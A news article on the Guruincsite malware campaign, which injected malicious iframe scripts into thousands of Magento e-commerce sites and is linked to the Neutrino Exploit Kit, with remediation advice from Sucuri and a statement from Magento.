Websites running the Magento CMS are being infected with malware in a fresh campaign which has impacted thousands of domains in a matter of days.
Over the weekend, researchers from Sucuri Labs said the attack involves the injection of malicious scripts through iframes from guruincsite.com.
There are two modified versions of the infection, and while one is obfuscated, the other is not -- giving security teams a virtual beacon to track the malicious domain involved in this latest attack on content management systems. According to the team, Google has already blacklisted almost 8,000 infected websites over the past 90 days. Webmasters in Google forums who have been affected by the campaign say malicious code has been found in design aspects of their Magento CMS systems, particularly within the Footer - Miscellaneous Scripts areas of their sites. Removing these scripts and then resubmitting clean websites back to Google for review should remove the blacklisting.
The Magento content management system, tailored for e-commerce, is used by over 200,000 companies worldwide. Sucuri is investigating the spread of Guruincsite and suspect "it was some vulnerability in Magento or one of the third-party extensions that allowed it to infect thousands of sites within a short time." However, the actual attack vector is yet to be discovered, which potentially placing hundreds of thousands of online retail websites -- and any financial data stored within -- at risk.
Researchers from Malwarebytes say guruincsite is also linked to the infrastructure of a campaign using the Neutrino Exploit Kit. The "neitrino" cyberattack campaign uses the same attack on the server side that Sucuri noticed, but instead compromises domains client side via web exploits. Websites compromised through a Flash exploit are harvested for financial data and also become slaves to a botnet system.
Sucuri recommends that webmasters make sure their systems are up-to-date and to consider using website firewalls to better protect online domains. A number of webmasters with infected sites have noticed unidentified admin users appearing in their systems, and immediate removal is the best way to go.
A Magento spokesperson told: "We are actively investigating reports of Magento sites being targeted by Guruincsite malware (Neutrino exploit kit) and are working with our developers in coordination with Magento hosting partners and community members. We have NOT identified a new attack vector at this time but rather have found that all sites that we have checked show as vulnerable to a previously identified code execution issue for which we released a patch in early 2015. With the exception of one identified Magento Enterprise Edition merchant, we have not found any other enterprise clients that have been affected. Magento Security & Support Teams are actively working with the one Magento Enterprise Edition merchant impacted by this issue."